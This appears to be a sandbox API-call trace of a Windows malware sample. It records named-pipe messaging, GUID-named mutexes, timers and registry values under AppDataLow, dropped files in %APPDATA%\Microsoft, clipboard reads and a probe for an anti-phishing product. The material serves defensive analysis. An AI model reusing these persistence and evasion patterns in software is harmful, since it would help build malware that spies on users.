0x7ff9757db6c0 [0209.163] OpenClipboard (hWndNewOwner=0x0) returned 1 [0209.164] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="GetClipboardData") returned 0x7ff9757daba0 [0209.164] GetClipboardData (uFormat=0x1) returned 0x0 [0209.164] GetProcAddress (hModule=0x7ff9757b0000, lpProcName="CloseClipboard") returned 0x7ff9757e0920 [0209.164] CloseClipboard () returned 1 [0209.165] GetMessageA (lpMsg=0x7b3fb20, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) Thread: id = 102 os_tid = 0xb2c [0209.296] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xad8 [0209.296] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0209.296] ConnectNamedPipe (in: hNamedPipe=0x1320, lpOverlapped=0x7bbfca0 | out: lpOverlapped=0x7bbfca0) returned 0 [0209.296] GetLastError () returned 0x3e5 [0209.296] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc90*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0249.119] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1598 [0249.119] ReadFile (in: hFile=0x1320, lpBuffer=0x7bbfc80, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x7bbfc58, lpOverlapped=0x7bbfc10 | out: lpBuffer=0x7bbfc80, lpNumberOfBytesRead=0x7bbfc58*=0x0, lpOverlapped=0x7bbfc10) returned 0 [0249.119] GetLastError () returned 0x3e5 [0249.119] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc00*=0x458, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0249.119] GetOverlappedResult (in: hFile=0x1320, lpOverlapped=0x7bbfc10, lpNumberOfBytesTransferred=0x7bbfc58, bWait=0 | out: lpNumberOfBytesTransferred=0x7bbfc58) returned 1 [0249.119] CloseHandle (hObject=0x1598) returned 1 [0249.120] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74935b4, lpParameter=0x7aaffa0, dwCreationFlags=0x0, lpThreadId=0x7bbfb40 | out: lpThreadId=0x7bbfb40*=0x954) returned 0x1598 [0249.120] CloseHandle (hObject=0x1598) returned 1 [0249.120] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1598 [0249.120] WriteFile (in: hFile=0x1320, lpBuffer=0x7bbfc30*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x7bbfc18, lpOverlapped=0x7bbfbd0 | out: lpBuffer=0x7bbfc30*, lpNumberOfBytesWritten=0x7bbfc18*=0xc, lpOverlapped=0x7bbfbd0) returned 1 [0249.120] CloseHandle (hObject=0x1598) returned 1 [0249.120] FlushFileBuffers (hFile=0x1320) returned 1 [0249.120] DisconnectNamedPipe (hNamedPipe=0x1320) returned 1 [0249.120] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.120] ConnectNamedPipe (in: hNamedPipe=0x1320, lpOverlapped=0x7bbfca0 | out: lpOverlapped=0x7bbfca0) returned 0 [0249.120] GetLastError () returned 0x3e5 [0249.120] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc90*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0249.121] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x958 [0249.121] ReadFile (in: hFile=0x1320, lpBuffer=0x7bbfc80, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x7bbfc58, lpOverlapped=0x7bbfc10 | out: lpBuffer=0x7bbfc80, lpNumberOfBytesRead=0x7bbfc58*=0x0, lpOverlapped=0x7bbfc10) returned 0 [0249.121] GetLastError () returned 0x3e5 [0249.121] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc00*=0x458, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0249.121] GetOverlappedResult (in: hFile=0x1320, lpOverlapped=0x7bbfc10, lpNumberOfBytesTransferred=0x7bbfc58, bWait=0 | out: lpNumberOfBytesTransferred=0x7bbfc58) returned 1 [0249.121] CloseHandle (hObject=0x958) returned 1 [0249.121] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74935b4, lpParameter=0x7aae480, dwCreationFlags=0x0, lpThreadId=0x7bbfb40 | out: lpThreadId=0x7bbfb40*=0x794) returned 0x958 [0249.122] CloseHandle (hObject=0x958) returned 1 [0249.122] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x958 [0249.122] WriteFile (in: hFile=0x1320, lpBuffer=0x7bbfc30*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x7bbfc18, lpOverlapped=0x7bbfbd0 | out: lpBuffer=0x7bbfc30*, lpNumberOfBytesWritten=0x7bbfc18*=0xc, lpOverlapped=0x7bbfbd0) returned 1 [0249.122] CloseHandle (hObject=0x958) returned 1 [0249.122] FlushFileBuffers (hFile=0x1320) returned 1 [0249.122] DisconnectNamedPipe (hNamedPipe=0x1320) returned 1 [0249.122] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.122] ConnectNamedPipe (in: hNamedPipe=0x1320, lpOverlapped=0x7bbfca0 | out: lpOverlapped=0x7bbfca0) returned 0 [0249.122] GetLastError () returned 0x3e5 [0249.122] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc90*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0249.122] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1598 [0249.122] ReadFile (in: hFile=0x1320, lpBuffer=0x7bbfc80, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x7bbfc58, lpOverlapped=0x7bbfc10 | out: lpBuffer=0x7bbfc80, lpNumberOfBytesRead=0x7bbfc58*=0x0, lpOverlapped=0x7bbfc10) returned 0 [0249.122] GetLastError () returned 0x3e5 [0249.122] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc00*=0x458, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0249.123] GetOverlappedResult (in: hFile=0x1320, lpOverlapped=0x7bbfc10, lpNumberOfBytesTransferred=0x7bbfc58, bWait=0 | out: lpNumberOfBytesTransferred=0x7bbfc58) returned 1 [0249.123] CloseHandle (hObject=0x1598) returned 1 [0249.123] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74935b4, lpParameter=0x7aae4a0, dwCreationFlags=0x0, lpThreadId=0x7bbfb40 | out: lpThreadId=0x7bbfb40*=0x700) returned 0x1598 [0249.123] CloseHandle (hObject=0x1598) returned 1 [0249.123] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1598 [0249.123] WriteFile (in: hFile=0x1320, lpBuffer=0x7bbfc30*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x7bbfc18, lpOverlapped=0x7bbfbd0 | out: lpBuffer=0x7bbfc30*, lpNumberOfBytesWritten=0x7bbfc18*=0xc, lpOverlapped=0x7bbfbd0) returned 1 [0249.123] CloseHandle (hObject=0x1598) returned 1 [0249.123] FlushFileBuffers (hFile=0x1320) returned 1 [0249.123] DisconnectNamedPipe (hNamedPipe=0x1320) returned 1 [0249.123] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.123] ConnectNamedPipe (in: hNamedPipe=0x1320, lpOverlapped=0x7bbfca0 | out: lpOverlapped=0x7bbfca0) returned 0 [0249.123] GetLastError () returned 0x3e5 [0249.123] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc90*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0249.124] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x958 [0249.124] ReadFile (in: hFile=0x1320, lpBuffer=0x7bbfc80, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x7bbfc58, lpOverlapped=0x7bbfc10 | out: lpBuffer=0x7bbfc80, lpNumberOfBytesRead=0x7bbfc58*=0x0, lpOverlapped=0x7bbfc10) returned 0 [0249.124] GetLastError () returned 0x3e5 [0249.124] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc00*=0x458, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0249.126] GetOverlappedResult (in: hFile=0x1320, lpOverlapped=0x7bbfc10, lpNumberOfBytesTransferred=0x7bbfc58, bWait=0 | out: lpNumberOfBytesTransferred=0x7bbfc58) returned 1 [0249.126] CloseHandle (hObject=0x958) returned 1 [0249.126] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74935b4, lpParameter=0x7aae4c0, dwCreationFlags=0x0, lpThreadId=0x7bbfb40 | out: lpThreadId=0x7bbfb40*=0x38c) returned 0x958 [0249.126] CloseHandle (hObject=0x958) returned 1 [0249.126] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x958 [0249.126] WriteFile (in: hFile=0x1320, lpBuffer=0x7bbfc30*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x7bbfc18, lpOverlapped=0x7bbfbd0 | out: lpBuffer=0x7bbfc30*, lpNumberOfBytesWritten=0x7bbfc18*=0xc, lpOverlapped=0x7bbfbd0) returned 1 [0249.126] CloseHandle (hObject=0x958) returned 1 [0249.126] FlushFileBuffers (hFile=0x1320) returned 1 [0249.126] DisconnectNamedPipe (hNamedPipe=0x1320) returned 1 [0249.126] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.126] ConnectNamedPipe (in: hNamedPipe=0x1320, lpOverlapped=0x7bbfca0 | out: lpOverlapped=0x7bbfca0) returned 0 [0249.126] GetLastError () returned 0x3e5 [0249.126] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc90*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0249.406] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x934 [0249.406] ReadFile (in: hFile=0x1320, lpBuffer=0x7bbfc80, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x7bbfc58, lpOverlapped=0x7bbfc10 | out: lpBuffer=0x7bbfc80, lpNumberOfBytesRead=0x7bbfc58*=0x0, lpOverlapped=0x7bbfc10) returned 0 [0249.406] GetLastError () returned 0x3e5 [0249.406] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc00*=0x458, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0249.406] GetOverlappedResult (in: hFile=0x1320, lpOverlapped=0x7bbfc10, lpNumberOfBytesTransferred=0x7bbfc58, bWait=0 | out: lpNumberOfBytesTransferred=0x7bbfc58) returned 1 [0249.406] CloseHandle (hObject=0x934) returned 1 [0249.406] lstrlenA (lpString="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}") returned 58 [0249.406] mbstowcs (in: _Dest=0x7aaf3a0, _Source="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}", _MaxCount=0x3b | out: _Dest="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}") returned 0x3a [0249.406] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0249.406] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}", lpDst=0x79b1610, nSize=0x57 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}") returned 0x57 [0249.407] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{5A76122F-F1D1-9CA2-4B2E-B590AF42B9C4}" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{5a76122f-f1d1-9ca2-4b2e-b590af42b9c4}"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0249.407] GetLastError () returned 0x2 [0249.407] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x934 [0249.407] WriteFile (in: hFile=0x1320, lpBuffer=0x7bbfc30*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x7bbfc18, lpOverlapped=0x7bbfbd0 | out: lpBuffer=0x7bbfc30*, lpNumberOfBytesWritten=0x7bbfc18*=0xc, lpOverlapped=0x7bbfbd0) returned 1 [0249.407] CloseHandle (hObject=0x934) returned 1 [0249.407] FlushFileBuffers (hFile=0x1320) returned 1 [0249.407] DisconnectNamedPipe (hNamedPipe=0x1320) returned 1 [0249.408] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.408] ConnectNamedPipe (in: hNamedPipe=0x1320, lpOverlapped=0x7bbfca0 | out: lpOverlapped=0x7bbfca0) returned 0 [0249.408] GetLastError () returned 0x3e5 [0249.408] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc90*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0251.972] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa64 [0251.972] ReadFile (in: hFile=0x1320, lpBuffer=0x7bbfc80, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x7bbfc58, lpOverlapped=0x7bbfc10 | out: lpBuffer=0x7bbfc80*, lpNumberOfBytesRead=0x7bbfc58*=0xc, lpOverlapped=0x7bbfc10) returned 1 [0251.972] CloseHandle (hObject=0xa64) returned 1 [0251.972] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa64 [0251.972] ReadFile (in: hFile=0x1320, lpBuffer=0x79b3630, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x7bbfc58, lpOverlapped=0x7bbfc10 | out: lpBuffer=0x79b3630*, lpNumberOfBytesRead=0x7bbfc58*=0x60, lpOverlapped=0x7bbfc10) returned 1 [0251.972] CloseHandle (hObject=0xa64) returned 1 [0251.972] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7bbfb00 | out: lpSystemTimeAsFileTime=0x7bbfb00*(dwLowDateTime=0x85e0f97f, dwHighDateTime=0x1d47567)) [0251.972] lstrlenA (lpString="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 58 [0251.972] lstrcpyA (in: lpString1=0x7aae620, lpString2="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}" | out: lpString1="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}" [0251.972] lstrlenA (lpString="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 58 [0251.972] mbstowcs (in: _Dest=0x7aaed50, _Source="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", _MaxCount=0x3b | out: _Dest="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 0x3a [0251.972] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x57 [0251.972] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}", lpDst=0x7aaedd0, nSize=0x57 | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}") returned 0x57 [0251.972] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{25e2f79f-402d-9fbf-7229-7443c66de827}"), lpSecurityAttributes=0x0) returned 1 [0251.973] lstrlenA (lpString="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09") returned 77 [0251.973] mbstowcs (in: _Dest=0x7aaed50, _Source="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09", _MaxCount=0x4e | out: _Dest="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09") returned 0x4d [0251.974] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x6a [0251.974] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09", lpDst=0x7aaee00, nSize=0x6a | out: lpDst="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09") returned 0x6a [0251.974] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{25E2F79F-402D-9FBF-7229-7443C66DE827}\\01D4756785E0F97F09" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{25e2f79f-402d-9fbf-7229-7443c66de827}\\01d4756785e0f97f09"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa64 [0251.974] WriteFile (in: hFile=0xa64, lpBuffer=0x79b3630*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x7bbfac8, lpOverlapped=0x0 | out: lpBuffer=0x79b3630*, lpNumberOfBytesWritten=0x7bbfac8*=0x60, lpOverlapped=0x0) returned 1 [0251.975] SetEndOfFile (hFile=0xa64) returned 1 [0251.975] CloseHandle (hObject=0xa64) returned 1 [0251.976] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa64 [0251.976] WriteFile (in: hFile=0x1320, lpBuffer=0x7bbfc30*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x7bbfc18, lpOverlapped=0x7bbfbd0 | out: lpBuffer=0x7bbfc30*, lpNumberOfBytesWritten=0x7bbfc18*=0xc, lpOverlapped=0x7bbfbd0) returned 1 [0251.976] CloseHandle (hObject=0xa64) returned 1 [0251.976] FlushFileBuffers (hFile=0x1320) returned 1 [0251.976] DisconnectNamedPipe (hNamedPipe=0x1320) returned 1 [0251.976] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.976] ConnectNamedPipe (in: hNamedPipe=0x1320, lpOverlapped=0x7bbfca0 | out: lpOverlapped=0x7bbfca0) returned 0 [0251.976] GetLastError () returned 0x3e5 [0251.976] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc90*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0252.674] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa0c [0252.674] ReadFile (in: hFile=0x1320, lpBuffer=0x7bbfc80, nNumberOfBytesToRead=0xc, lpNumberOfBytesRead=0x7bbfc58, lpOverlapped=0x7bbfc10 | out: lpBuffer=0x7bbfc80, lpNumberOfBytesRead=0x7bbfc58*=0x0, lpOverlapped=0x7bbfc10) returned 0 [0252.675] GetLastError () returned 0x3e5 [0252.675] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc00*=0x458, bWaitAll=0, dwMilliseconds=0x2710) returned 0x1 [0252.675] GetOverlappedResult (in: hFile=0x1320, lpOverlapped=0x7bbfc10, lpNumberOfBytesTransferred=0x7bbfc58, bWait=0 | out: lpNumberOfBytesTransferred=0x7bbfc58) returned 1 [0252.675] CloseHandle (hObject=0xa0c) returned 1 [0252.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x74935b4, lpParameter=0x7aaff80, dwCreationFlags=0x0, lpThreadId=0x7bbfb40 | out: lpThreadId=0x7bbfb40*=0x7b8) returned 0xa0c [0252.675] CloseHandle (hObject=0xa0c) returned 1 [0252.675] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa0c [0252.675] WriteFile (in: hFile=0x1320, lpBuffer=0x7bbfc30*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x7bbfc18, lpOverlapped=0x7bbfbd0 | out: lpBuffer=0x7bbfc30*, lpNumberOfBytesWritten=0x7bbfc18*=0xc, lpOverlapped=0x7bbfbd0) returned 1 [0252.675] CloseHandle (hObject=0xa0c) returned 1 [0252.675] FlushFileBuffers (hFile=0x1320) returned 1 [0252.675] DisconnectNamedPipe (hNamedPipe=0x1320) returned 1 [0252.676] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0252.676] ConnectNamedPipe (in: hNamedPipe=0x1320, lpOverlapped=0x7bbfca0 | out: lpOverlapped=0x7bbfca0) returned 0 [0252.676] GetLastError () returned 0x3e5 [0252.676] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7bbfc90*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) Thread: id = 103 os_tid = 0xb24 [0209.298] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{111F6A44-3C4D-6BC7-CED5-30CFE2D96473}") returned 0x13d0 [0209.298] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{62D813F7-59FC-E439-F3B6-9D58D74A210C}") returned 0x18a0 [0209.298] OpenMutexA (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Local\\{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned 0x18a4 [0209.298] SetLastError (dwErrCode=0xb7) [0209.298] CreateEventA (lpEventAttributes=0x74f77b0, bManualReset=1, bInitialState=0, lpName="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 0x1880 [0209.298] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{A8435A97-E752-1A33-B15C-0BEE75506F02}") returned 0x1894 [0209.298] OpenMutexA (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Local\\{FB999B87-1EC7-E503-005F-32E93403862D}") returned 0x188c [0209.298] SetLastError (dwErrCode=0xb7) [0209.298] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{E089BDC1-BF33-12AE-4914-63668D8847FA}") returned 0x1888 [0209.298] OpenMutexA (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="Local\\{53667D0F-9637-FD89-3837-2A81EC5BFE45}") returned 0x1890 [0209.298] SetLastError (dwErrCode=0xb7) [0209.298] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7c3f8a0*=0x458, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0249.117] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName="Local\\{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}") returned 0x0 [0249.117] CreateWaitableTimerA (lpTimerAttributes=0x74f77b0, bManualReset=1, lpTimerName="Local\\{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}") returned 0x137c [0249.117] GetLastError () returned 0x0 [0249.117] PathFindFileNameA (pszPath="Local\\{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}") returned="{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}" [0249.117] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f7d0 | out: phkResult=0x7c3f7d0*=0x139c) returned 0x0 [0249.118] RegQueryValueExA (in: hKey=0x139c, lpValueName="{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}", lpReserved=0x0, lpType=0x7c3f770, lpData=0x0, lpcbData=0x7c3f818*=0x0 | out: lpType=0x7c3f770*=0x0, lpData=0x0, lpcbData=0x7c3f818*=0x0) returned 0x2 [0249.118] RegCloseKey (hKey=0x139c) returned 0x0 [0249.118] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7c3f7a8 | out: lpSystemTimeAsFileTime=0x7c3f7a8*(dwLowDateTime=0x842ef5a2, dwHighDateTime=0x1d47567)) [0249.118] PathFindFileNameA (pszPath="Local\\{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}") returned="{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}" [0249.118] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f740 | out: phkResult=0x7c3f740*=0x139c) returned 0x0 [0249.118] RegSetValueExA (in: hKey=0x139c, lpValueName="{36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}", Reserved=0x0, dwType=0x3, lpData=0x7c3f7a8*, cbData=0x8 | out: lpData=0x7c3f7a8*) returned 0x0 [0249.118] RegCloseKey (hKey=0x139c) returned 0x0 [0249.118] SetWaitableTimer (hTimer=0x137c, lpDueTime=0x7c3f7a8, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0249.118] OpenWaitableTimerA (dwDesiredAccess=0x100002, bInheritHandle=0, lpTimerName=0x0) returned 0x0 [0249.118] CreateWaitableTimerA (lpTimerAttributes=0x74f77b0, bManualReset=1, lpTimerName=0x0) returned 0x139c [0249.118] GetLastError () returned 0x0 [0249.118] SetWaitableTimer (hTimer=0x139c, lpDueTime=0x7c3f818, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0249.118] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\SecureBrain\\PhishWall", ulOptions=0x0, samDesired=0x20219, phkResult=0x7c3f8d0 | out: phkResult=0x7c3f8d0*=0x0) returned 0x2 [0249.119] CallNamedPipeA (in: lpNamedPipeName="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}", lpInBuffer=0x7aaff80, nInBufferSize=0xc, lpOutBuffer=0x7c3f7c0, nOutBufferSize=0xc, lpBytesRead=0x7c3f810, nTimeOut=0x1 | out: lpOutBuffer=0x7c3f7c0, lpBytesRead=0x7c3f810) returned 1 [0249.120] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f7d8 | out: phkResult=0x7c3f7d8*=0x958) returned 0x0 [0249.120] RegSetValueExA (in: hKey=0x958, lpValueName="Client", Reserved=0x0, dwType=0x3, lpData=0x74f6ba0*, cbData=0x28 | out: lpData=0x74f6ba0*) returned 0x0 [0249.121] RegCloseKey (hKey=0x958) returned 0x0 [0249.121] CallNamedPipeA (in: lpNamedPipeName="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}", lpInBuffer=0x7aaff80, nInBufferSize=0xc, lpOutBuffer=0x7c3f7c0, nOutBufferSize=0xc, lpBytesRead=0x7c3f810, nTimeOut=0x1 | out: lpOutBuffer=0x7c3f7c0, lpBytesRead=0x7c3f810) returned 1 [0249.122] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f7d8 | out: phkResult=0x7c3f7d8*=0x1598) returned 0x0 [0249.122] RegSetValueExA (in: hKey=0x1598, lpValueName="Client", Reserved=0x0, dwType=0x3, lpData=0x74f6ba0*, cbData=0x28 | out: lpData=0x74f6ba0*) returned 0x0 [0249.122] RegCloseKey (hKey=0x1598) returned 0x0 [0249.122] CallNamedPipeA (in: lpNamedPipeName="\\\\.\\pipe\\{072BB6F5-BAEC-D114-FC2B-8E95F08FA299}", lpInBuffer=0x7aaff80, nInBufferSize=0xc, lpOutBuffer=0x7c3f7c0, nOutBufferSize=0xc, lpBytesRead=0x7c3f810, nTimeOut=0x1 | out: lpOutBuffer=0x7c3f7c0, lpBytesRead=0x7c3f810) returned 1 [0249.124] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x7c3f7d8 | out: phkResult=0x7c3f7d8*=0x958) returned 0x0 [0249.124] RegSetValueExA (in: hKey=0x958, lpValueName="Client", Reserved=0x0, dwType=0x3, 